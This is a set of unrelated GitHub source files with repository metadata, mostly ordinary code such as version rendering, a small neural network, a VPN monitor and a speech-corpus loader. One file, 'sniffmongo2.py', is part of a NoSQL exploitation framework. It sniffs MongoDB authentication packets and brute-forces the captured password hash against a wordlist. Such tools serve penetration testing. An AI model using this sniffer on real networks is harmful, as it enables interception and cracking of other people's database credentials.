if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {
"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None,
}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {
"version": rendered,
"full-revisionid": pieces["long"],
"dirty": pieces["dirty"],
"error": None,
"date": pieces.get("date"),
}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split("/"):
root = os.path.dirname(root)
except NameError:
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None,
}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to compute version",
"date": None,
}
| {
"content_hash": "0a495a5749afbf13565ecafcd59208f0",
"timestamp": "",
"source": "github",
"line_count": 547,
"max_line_length": 88,
"avg_line_length": 32.89579524680073,
"alnum_prop": 0.5689674335889741,
"repo_name": "csdms/bmi-python",
"id": "4cfe5bf7c555eb6f4e9c330ea2ddb997b0cdd727",
"size": "18468",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bmipy/_version.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2339"
},
{
"name": "Python",
"bytes": "114175"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from solo.admin import SingletonModelAdmin
from . import models
admin.site.register(models.SiteConfiguration, SingletonModelAdmin)
| {
"content_hash": "d373bc4af6f66fff61e69de65093d006",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 66,
"avg_line_length": 33,
"alnum_prop": 0.8545454545454545,
"repo_name": "Arlefreak/ApiArlefreak",
"id": "b7876eba61c0b0f2ddc5dff3b0a6c9a89b68a55b",
"size": "165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web_client/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "64132"
}
],
"symlink_target": ""
} |
import popen2
import os
def explainStatus(statusCode):
signal = statusCode & 0xFF
exitCode = statusCode >> 8
if signal == 0:
return 'exit %d' % exitCode
else:
return 'signal %d' % signal
repos = ['/etc', '/proc', '/var']
# launch 3 async calls:
procs = [popen2.Popen3(r'ls -l %s > %s.log 2>&1'%(repo,repo.lstrip('/'))) for repo in repos]
# wait.
stats = [proc.wait() for proc in procs]
# check for results:
for k, v in zip(repos, [explainStatus(stat) for stat in stats]):
print k, v
# THIS IS NOT BACKGROUND! THERE IS NO WAY IN PYTHON 2.2!
| {
"content_hash": "9aac68a7aacf3194c726a213441c5d5b",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 92,
"avg_line_length": 28.9,
"alnum_prop": 0.629757785467128,
"repo_name": "aclisp/large-scale",
"id": "cc2142ed7b17ffb88a4add29ab24846a473d5b7e",
"size": "601",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aprlab/exampleBackground22.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "913"
},
{
"name": "C",
"bytes": "5141993"
},
{
"name": "C++",
"bytes": "1756184"
},
{
"name": "CSS",
"bytes": "12830"
},
{
"name": "Java",
"bytes": "28931"
},
{
"name": "Objective-C",
"bytes": "11541"
},
{
"name": "Python",
"bytes": "3656"
},
{
"name": "Shell",
"bytes": "2157"
}
],
"symlink_target": ""
} |
"""ann.py: Experiments with neural networks"""
import numpy as np
from scipy import optimize
# Whole Class with additions:
class NeuralNetwork(object):
def __init__(self):
# Define Hyperparameters
self.inputLayerSize = 2
self.outputLayerSize = 1
self.hiddenLayerSize = 2
# Weights (parameters)
self.W1 = np.random.randn(self.inputLayerSize, self.hiddenLayerSize)
self.W2 = np.random.randn(self.hiddenLayerSize, self.outputLayerSize)
def forward(self, X):
# Propagate inputs through network
self.z2 = np.dot(X, self.W1)
self.a2 = self.sigmoid(self.z2)
self.z3 = np.dot(self.a2, self.W2)
yHat = self.sigmoid(self.z3)
return yHat
def sigmoid(self, z):
# Apply sigmoid activation function to scalar, vector, or matrix
return 1 / (1 + np.exp(-z))
def sigmoidPrime(self, z):
# Gradient of sigmoid
return np.exp(-z) / ((1 + np.exp(-z)) ** 2)
def costFunction(self, X, y):
# Compute cost for given X,y, use weights already stored in class.
self.yHat = self.forward(X)
J = 0.5 * sum((y - self.yHat) ** 2)
return J
def costFunctionPrime(self, X, y):
# Compute derivative with respect to W and W2 for a given X and y:
self.yHat = self.forward(X)
delta3 = np.multiply(-(y - self.yHat), self.sigmoidPrime(self.z3))
dJdW2 = np.dot(self.a2.T, delta3)
delta2 = np.dot(delta3, self.W2.T) * self.sigmoidPrime(self.z2)
dJdW1 = np.dot(X.T, delta2)
return dJdW1, dJdW2
# Helper Functions
def getParams(self):
# Get W1 and W2 unrolled into vector:
params = np.concatenate((self.W1.ravel(), self.W2.ravel()))
return params
def setParams(self, params):
# Set W1 and W2 using single paramater vector.
W1_start = 0
W1_end = self.hiddenLayerSize * self.inputLayerSize
self.W1 = np.reshape(params[W1_start:W1_end],
(self.inputLayerSize, self.hiddenLayerSize))
W2_end = W1_end + self.hiddenLayerSize * self.outputLayerSize
self.W2 = np.reshape(params[W1_end:W2_end],
(self.hiddenLayerSize, self.outputLayerSize))
def computeGradients(self, X, y):
dJdW1, dJdW2 = self.costFunctionPrime(X, y)
return np.concatenate((dJdW1.ravel(), dJdW2.ravel()))
class NNTrainer(object):
def __init__(self, N):
# Make Local reference to network:
self.N = N
def callbackF(self, params):
self.N.setParams(params)
self.J.append(self.N.costFunction(self.X, self.y))
def costFunctionWrapper(self, params, X, y):
self.N.setParams(params)
cost = self.N.costFunction(X, y)
grad = self.N.computeGradients(X, y)
return cost, grad
def train(self, X, y):
# Make an internal variable for the callback function:
self.X = X
self.y = y
# Make empty list to store costs:
self.J = []
params0 = self.N.getParams()
options = {'maxiter': 200, 'disp': True}
_res = optimize.minimize(self.costFunctionWrapper, params0, jac=True,
method='BFGS',
args=(X, y), options=options,
callback=self.callbackF)
self.N.setParams(_res.x)
self.optimizationResults = _res
if __name__ == '__main__':
X = np.array(([0, 0], [0, 1], [1, 0], [1, 1]), dtype=float)
y = np.array(([0], [1], [1], [1]), dtype=float)
nn = NeuralNetwork()
print nn.forward(X)
nt = NNTrainer(nn)
nt.train(X, y)
#print [int(round(x)) for x in nn.forward(X)]
print nn.forward(X)
| {
"content_hash": "38a21b8a8e1815ab48c44bb5d49d057f",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 77,
"avg_line_length": 31.34710743801653,
"alnum_prop": 0.5792248879514896,
"repo_name": "DrigerG/IIITB-ML",
"id": "41052c279ecb9ffa784fcc90094432117fe4519b",
"size": "3816",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "experiments/ann/ann.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Julia",
"bytes": "4775"
},
{
"name": "Python",
"bytes": "147004"
}
],
"symlink_target": ""
} |
class FixQueue(list) :
def __init__(self, queue_size) :
self.queue_size = queue_size
print ("Initializing - FixQueue (Queue Size : %s) " % (self.queue_size))
def append(self, data) :
list.append(self, data)
if len(self) > self.queue_size : del self[0]
def clear(self) :
del self[:]
def pop(self, index=0) :
rvalue = self[index]
del self[index]
return rvalue
| {
"content_hash": "541ebcf5f518769a520255e35b271a8f",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 74,
"avg_line_length": 19.3,
"alnum_prop": 0.6373056994818653,
"repo_name": "minoku/FixQueue",
"id": "2c9bfafa7a3ad08ecddc883cb297ab9cccb402e6",
"size": "387",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "FixQueue/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1512"
}
],
"symlink_target": ""
} |
"""
None
"""
"""
The read4 API is already defined for you.
@param buf, a list of characters
@return an integer
def read4(buf):
# Below is an example of how the read4 API can be called.
file = File("abcdefghijk") # File is "abcdefghijk", initially file pointer (fp) points to 'a'
buf = [' '] * 4 # Create buffer with enough space to store characters
read4(buf) # read4 returns 4. Now buf = ['a','b','c','d'], fp points to 'e'
read4(buf) # read4 returns 4. Now buf = ['e','f','g','h'], fp points to 'i'
read4(buf) # read4 returns 3. Now buf = ['i','j','k',...], fp points to end of file
"""
class Solution:
def read(self, buf, n):
"""
:type buf: Destination buffer (List[str])
:type n: Number of characters to read (int)
:rtype: The number of actual characters read (int)
"""
cnt = 0
tmp = [''] * 4
while cnt < n:
curr = read4(tmp)
i = 0
while i < curr and cnt < n:
buf[cnt] = tmp[i]
i += 1
cnt += 1
if curr < 4:
break
return cnt
| {
"content_hash": "fbf8bd1e86407e0ea3c6d117f4923776",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 93,
"avg_line_length": 28.525,
"alnum_prop": 0.5205959684487291,
"repo_name": "franklingu/leetcode-solutions",
"id": "8798c606e9cab7902fb3c09ddfe39e7c4d8d9502",
"size": "1141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "questions/read-n-characters-given-read4/Solution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "8919"
},
{
"name": "Java",
"bytes": "173033"
},
{
"name": "Python",
"bytes": "996874"
},
{
"name": "Shell",
"bytes": "2559"
}
],
"symlink_target": ""
} |
"""
raven.contrib.django.raven_compat.middleware.wsgi
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from raven.contrib.django.middleware.wsgi import * # NOQA
| {
"content_hash": "3bfd2780b3b26c8e72fddefd2e916619",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 75,
"avg_line_length": 29.1,
"alnum_prop": 0.6185567010309279,
"repo_name": "collective/mr.poe",
"id": "e8cb865edf45189571f95203a6902c96a47e9227",
"size": "291",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "raven/contrib/django/raven_compat/middleware/wsgi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "285308"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
# Local module
from .structure import Chain, Atom
from .PDB import PDB
# Conditional import
try:
import MDAnalysis
except ImportError:
IS_MDANALYSIS = False
else:
IS_MDANALYSIS = True
# Create the __all__ keyword according to the conditional import
__all__ = ['chains_from_files']
if IS_MDANALYSIS:
__all__ += ['chains_from_trajectory']
def chains_from_files(path_list):
for pdb_name in path_list:
pdb = PDB(pdb_name)
for chain in pdb.get_chains():
# build comment
comment = pdb_name
if chain.model:
comment += " | model %s" % (chain.model)
if chain.name:
comment += " | chain %s" % (chain.name)
yield comment, chain
def chains_from_trajectory(trajectory, topology):
universe = MDAnalysis.Universe(topology, trajectory)
selection = universe.select_atoms("backbone")
#Initialize structure with the selection
structure = Chain()
for atm in selection:
atom = Atom.read_from_xtc(atm)
# append structure with atom
structure.add_atom(atom)
for ts in universe.trajectory:
#Update only with new coordinates
structure.set_coordinates(selection.positions)
# define structure comment
comment = "%s | frame %s" % (trajectory, ts.frame)
yield comment, structure
| {
"content_hash": "930e63af62188fa719470dd3e842835e",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 64,
"avg_line_length": 27.21153846153846,
"alnum_prop": 0.6303886925795052,
"repo_name": "jbarnoud/PBxplore",
"id": "570523acf5f462dde78f16811bc5cf0f0c7f3ec5",
"size": "1463",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pbxplore/structure/loader.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "114180"
},
{
"name": "Shell",
"bytes": "10784"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/intangible/pet/shared_malkloc_hue.iff"
result.attribute_template_id = -1
result.stfName("","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "43eff905f6675612aefdb7f4a065ff24",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 65,
"avg_line_length": 21.46153846153846,
"alnum_prop": 0.6774193548387096,
"repo_name": "obi-two/Rebelion",
"id": "62faa4006940ce57a79561e06ea578c730ea30ba",
"size": "424",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/intangible/pet/shared_malkloc_hue.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
from setuptools import setup
setup(
name="aiogremlin",
version="0.1.0",
url="",
license="MIT",
author="davebshow",
author_email="davebshow@gmail.com",
description="Python 3 driver for TP3 Gremlin Server built on Asyncio and aiohttp",
long_description=open("README.txt").read(),
packages=["aiogremlin", "tests"],
install_requires=[
"aiohttp==0.16.5",
"aiowebsocketclient==0.0.3"
],
test_suite="tests",
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3 :: Only'
]
)
| {
"content_hash": "fe06a001be970101acd1040b9a32daf6",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 86,
"avg_line_length": 29.896551724137932,
"alnum_prop": 0.5963091118800461,
"repo_name": "platinummonkey/trolliusgremlin",
"id": "57496da39ab1fa20f3e649c1ca8eb555b7e585ba",
"size": "867",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "39448"
}
],
"symlink_target": ""
} |
"""Setup file for our unittest demo application"""
from setuptools import setup
if __name__ == "__main__":
setup(use_scm_version={"version_scheme": "no-guess-dev"})
| {
"content_hash": "9a1112d7b4245d943aaaca937d22adbe",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 61,
"avg_line_length": 28.5,
"alnum_prop": 0.6666666666666666,
"repo_name": "blue-yonder/pyscaffold",
"id": "53084423a135aabb6588bf0692e3029017bfbbb1",
"size": "193",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/demoapp_data/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "321819"
},
{
"name": "Shell",
"bytes": "4793"
}
],
"symlink_target": ""
} |
import re
import subprocess
import time
import sys
from location import Location
from measurement import ipsec_status, restart_ipsec
from notifier import pusher
from settings import PROWL_NOTIFY_API_KEYS, CHECK_INTERVAL, SENDGRID_API_KEY
def check_settings():
try:
assert len(PROWL_NOTIFY_API_KEYS) > 0, "NO PROWL_NOTIFY_API_KEYS is set."
assert len(SENDGRID_API_KEY) > 0, "NO SENDGRID_API_KEY is set."
return True
except AssertionError as e:
print e.message
def check_all_locations(locations):
try:
ips = [l.ip for l in locations]
p = subprocess.Popen(['fping'] + ips, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
return output
except OSError as e:
pusher.push('Check All Locations', str(e))
def main():
status_regex = re.compile("(\d+\.\d+\.\d+\.\d+).*?(alive|unreachable)")
locations = [
Location('Basel', '192.168.81.1', 'basel@physio-zentrum.ch'),
Location('St.Gallen', '192.168.129.1', 'stgallen@physio-zentrum.ch'),
Location('Wetzikon', '172.16.6.1', 'wetzikon@physio-zentrum.ch'),
Location('Server', '192.168.70.5', 'remo@liebi.net')
]
restarted = False
downtime_counter = 0
while True:
down_connections = []
result = status_regex.findall(check_all_locations(locations))
for i in range(len(result)):
ip = result[i][0]
reply = result[i][1]
location = (item for item in locations if item.ip == ip).next()
if reply == 'unreachable':
down_connections.append(location)
location.check_location(False)
else:
location.check_location(True)
if len(down_connections) >= 3:
downtime_counter += 1
if not restarted and downtime_counter == 4:
message = """ Hallo. <p>Es gab ein Problem mit den Verbindungen mit mehreren Standorten</p>
<p>({down})</p>
Der Server wird nun automatisch neu gestartet.
Dies kann dazu führen, dass Simed kurzzeitig unterbrochen wird.
Sorry für die umstände.<br/><br/>
Lieber Gruss
Remo
<br/><br/><br/>
===<br/>
{locations}
""".format(locations='<br/>'.join([i.get_connection_phrase() for i in locations]),
down=','.join([i.name for i in down_connections]))
pusher.send_mail(locations, "Neustart", message)
pusher.push('trying to restart the l2tp service in 60 seconds',
'{} Connections are down!({})'.format(len(down_connections),
', '.join([i.name for i in down_connections])),
2)
ipsec_status()
time.sleep(60)
restart_ipsec()
restarted = True
if restarted and downtime_counter % 6 == 0:
ipsec_status()
elif restarted:
restarted = False
pusher.push('IPSec seems to be running again.',
','.join([i.get_connection_phrase() for i in locations]))
downtime_counter = 0
time.sleep(CHECK_INTERVAL)
if __name__ == '__main__':
if len(sys.argv) == 1:
if check_settings():
print 'starting script'
main()
else:
print 'failed loading settings. please check your vpn_checker.conf' \
' and settings.py or that the env variables are set correctly!'
else:
for arg in sys.argv:
if arg == '__main__.py':
pass
if arg == 'testmail':
l = Location('testlocation', '', 'remo@liebi.net')
pusher.send_mail(l, 'TestMail', 'TestMail')
print 'TestMail sent.' | {
"content_hash": "14b00d40e78c1b0ad047ddab58403570",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 113,
"avg_line_length": 36.6283185840708,
"alnum_prop": 0.5332205846822904,
"repo_name": "rliebi/physio_vpn_checker",
"id": "5ec65b9d29a2e8d3b7dc3fe71d9a8e4752b90b6f",
"size": "4167",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/__main__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19148"
}
],
"symlink_target": ""
} |
from scapy.all import *
import re
import hashlib
from termcolor import colored
import os
md5 = hashlib.md5
def get_packets(port, iface, count):
packets = sniff(filter="port "+str(port)+"", count=count, iface=str(iface))
return packets
def parse_packets(port, iface, count):
packets=""
packet=""
user=""
nonce=""
key=""
packets = get_packets(port, iface, count)
for i in xrange(len(packets)):
if "key" in re.findall(r'[A-Za-z0-9]{3,}', str(packets[i])):
packet=packets[i]
break
if(len(packet)>=8):
nonce = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[4]
user = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[6]
key = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[8]
flag=1
return user, nonce, key,flag
else:
flag=0
return user, nonce, key,flag
def gen_pass(user, nonce, passw):
return md5(nonce + user + md5(user + ":mongo:" + str(passw)).hexdigest()).hexdigest();
def sniff_mongo():
print colored("[-] Sniff packages...",'blue')
print colored("[-] Parse packages...",'yellow')
user, nonce, key, flag = parse_packets("27017", "eth0", 10)
while True:
if flag==1:
print colored("[-] Sniff Completed \n",'green');
print colored("Prepair to brute...",'green')
os.getcwd()
try:
file_len = open('./dictionary/b.txt')
file = file_len.readlines()
for i in file:
new=i.split('\n')[0]
passw=new.split(':')[1]
#passw = file.readline().split('\n')[0]
if gen_pass(user, nonce, passw) == key:
print colored("\nFound - "+user+":"+passw,'green')
break
except IOError:
print colored("[-] Plse provide file name to brute force",'red')
break
else:
user, nonce, key, flag = parse_packets("27017", "eth0", 10)
| {
"content_hash": "d77ba3372cecb4ec2d260dcab7d6df0a",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 87,
"avg_line_length": 27.063492063492063,
"alnum_prop": 0.6205278592375366,
"repo_name": "torque59/Nosql-Exploitation-Framework",
"id": "a76eaedd89a32a472bb6b5a2ea0562b41e686d71",
"size": "1705",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "sniff/sniffmongo2.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "83133"
},
{
"name": "Shell",
"bytes": "355"
}
],
"symlink_target": ""
} |
__author__ = 'liam'
from flask_login import UserMixin
from flask import session
from .. import db
from ..helpers.google_helper import get_plus_profile
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
google_id = db.Column(db.Unicode(40), nullable=True)
google_data = db.Column(db.PickleType)
def __init__(self, uid, data):
self.google_id = uid
self.google_data = data
def _asdict(self):
return dict(id=self.id)
def is_authenticated(self):
if session[u'credentials'] is None:
return False
if session[u'gplus_id'] != self.id:
return False
return True
@classmethod
def get_user(cls, gid, credentials):
u = User.query.filter_by(google_id=gid).scalar()
if u is None:
result = get_plus_profile(gid, credentials)
u = User(gid, result)
db.session.add(u)
db.session.commit()
return u
| {
"content_hash": "f8dbf65b842419379af3bcae5ad9e9b3",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 56,
"avg_line_length": 27.416666666666668,
"alnum_prop": 0.601823708206687,
"repo_name": "OldGermanTrick/oldgermantrick",
"id": "a50b34dec1557186336c0447400e2a6fb8dcaa38",
"size": "987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oldgermantrick/models/user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "48834"
},
{
"name": "HTML",
"bytes": "11976"
},
{
"name": "JavaScript",
"bytes": "141003"
},
{
"name": "Python",
"bytes": "22908"
}
],
"symlink_target": ""
} |
"""
Corpus loading worker
---------------------
"""
from __future__ import annotations
import multiprocessing as mp
import os
from queue import Empty, Queue
from typing import Dict, Optional, Union
import sqlalchemy
import sqlalchemy.engine
from sqlalchemy.orm import Session
from montreal_forced_aligner.corpus.classes import FileData
from montreal_forced_aligner.corpus.helper import find_exts
from montreal_forced_aligner.db import File, SoundFile, Speaker, SpeakerOrdering, Utterance
from montreal_forced_aligner.dictionary.multispeaker import MultispeakerSanitizationFunction
from montreal_forced_aligner.exceptions import SoundFileError, TextGridParseError, TextParseError
from montreal_forced_aligner.helper import mfa_open
from montreal_forced_aligner.utils import Counter, Stopped
__all__ = ["AcousticDirectoryParser", "CorpusProcessWorker", "Job"]
class AcousticDirectoryParser(mp.Process):
"""
Worker for processing directories for acoustic sound files
Parameters
----------
corpus_directory: str
Directory to parse
job_queue: Queue
Queue to add file names to
audio_directory: str
Directory with additional audio files
stopped: :class:`~montreal_forced_aligner.utils.Stopped`
Check for whether to exit early
finished_adding: :class:`~montreal_forced_aligner.utils.Stopped`
Check to set when the parser is done adding files to the queue
file_counts: :class:`~montreal_forced_aligner.utils.Counter`
Counter for the number of total files that the parser has found
"""
def __init__(
self,
corpus_directory: str,
job_queue: Queue,
audio_directory: str,
stopped: Stopped,
finished_adding: Stopped,
file_counts: Counter,
):
mp.Process.__init__(self)
self.corpus_directory = corpus_directory
self.job_queue = job_queue
self.audio_directory = audio_directory
self.stopped = stopped
self.finished_adding = finished_adding
self.file_counts = file_counts
def run(self) -> None:
"""
Run the corpus loading job
"""
use_audio_directory = False
all_sound_files = {}
if self.audio_directory and os.path.exists(self.audio_directory):
use_audio_directory = True
for root, _, files in os.walk(self.audio_directory, followlinks=True):
exts = find_exts(files)
wav_files = {k: os.path.join(root, v) for k, v in exts.wav_files.items()}
other_audio_files = {
k: os.path.join(root, v) for k, v in exts.other_audio_files.items()
}
all_sound_files.update(other_audio_files)
all_sound_files.update(wav_files)
for root, _, files in os.walk(self.corpus_directory, followlinks=True):
exts = find_exts(files)
relative_path = root.replace(self.corpus_directory, "").lstrip("/").lstrip("\\")
if self.stopped.stop_check():
break
if not use_audio_directory:
all_sound_files = {}
exts.wav_files = {k: os.path.join(root, v) for k, v in exts.wav_files.items()}
exts.other_audio_files = {
k: os.path.join(root, v) for k, v in exts.other_audio_files.items()
}
all_sound_files.update(exts.other_audio_files)
all_sound_files.update(exts.wav_files)
for file_name in exts.identifiers:
if self.stopped.stop_check():
break
wav_path = None
transcription_path = None
if file_name in all_sound_files:
wav_path = all_sound_files[file_name]
if file_name in exts.lab_files:
lab_name = exts.lab_files[file_name]
transcription_path = os.path.join(root, lab_name)
elif file_name in exts.textgrid_files:
tg_name = exts.textgrid_files[file_name]
transcription_path = os.path.join(root, tg_name)
if wav_path is None and transcription_path is None: # Not a file for MFA
continue
if wav_path is None:
continue
self.job_queue.put((file_name, wav_path, transcription_path, relative_path))
self.file_counts.increment()
self.finished_adding.stop()
class CorpusProcessWorker(mp.Process):
"""
Multiprocessing corpus loading worker
Attributes
----------
job_q: :class:`~multiprocessing.Queue`
Job queue for files to process
return_dict: dict
Dictionary to catch errors
return_q: :class:`~multiprocessing.Queue`
Return queue for processed Files
stopped: :class:`~montreal_forced_aligner.utils.Stopped`
Stop check for whether corpus loading should exit
finished_adding: :class:`~montreal_forced_aligner.utils.Stopped`
Signal that the main thread has stopped adding new files to be processed
"""
def __init__(
self,
name: int,
job_q: mp.Queue,
return_q: mp.Queue,
stopped: Stopped,
finished_adding: Stopped,
speaker_characters: Union[int, str],
sanitize_function: Optional[MultispeakerSanitizationFunction],
sample_rate: Optional[int],
):
mp.Process.__init__(self)
self.name = str(name)
self.job_q = job_q
self.return_q = return_q
self.stopped = stopped
self.finished_adding = finished_adding
self.finished_processing = Stopped()
self.sanitize_function = sanitize_function
self.speaker_characters = speaker_characters
self.sample_rate = sample_rate
def run(self) -> None:
"""
Run the corpus loading job
"""
while True:
try:
file_name, wav_path, text_path, relative_path = self.job_q.get(timeout=1)
except Empty:
if self.finished_adding.stop_check():
break
continue
if self.stopped.stop_check():
continue
try:
file = FileData.parse_file(
file_name,
wav_path,
text_path,
relative_path,
self.speaker_characters,
self.sanitize_function,
self.sample_rate,
)
self.return_q.put(file)
except TextParseError as e:
self.return_q.put(("decode_error_files", e))
except TextGridParseError as e:
self.return_q.put(("textgrid_read_errors", e))
except SoundFileError as e:
self.return_q.put(("sound_file_errors", e))
except Exception as e:
self.stopped.stop()
self.return_q.put(("error", e))
self.finished_processing.stop()
return
class Job:
"""
Class representing information about corpus jobs that will be run in parallel.
Jobs have a set of speakers that they will process, along with all files and utterances associated with that speaker.
As such, Jobs also have a set of dictionaries that the speakers use, and argument outputs are largely dependent on
the pronunciation dictionaries in use.
Parameters
----------
name: int
Job number is the job's identifier
db_engine: sqlalchemy.engine.Engine
Database engine to use in looking up relevant information
Attributes
----------
dictionary_ids: list[int]
List of dictionary ids that the job's speakers use
"""
name: int
def __init__(self, name: int, db_engine: sqlalchemy.engine.Engine):
self.name = name
self.db_engine = db_engine
self.dictionary_ids = []
with Session(self.db_engine) as session:
self.refresh_dictionaries(session)
self.has_data = True
def refresh_dictionaries(self, session: Session) -> None:
"""
Refresh the dictionaries that will be processed by this job
Parameters
----------
session: :class:`~sqlalchemy.orm.session.Session`
Session to use for refreshing
"""
job_dict_query = (
session.query(Speaker.dictionary_id).filter(Speaker.job_id == self.name).distinct()
)
self.dictionary_ids = [x[0] for x in job_dict_query]
def construct_path_dictionary(
self, directory: str, identifier: str, extension: str
) -> Dict[str, str]:
"""
Helper function for constructing dictionary-dependent paths for the Job
Parameters
----------
directory: str
Directory to use as the root
identifier: str
Identifier for the path name, like ali or acc
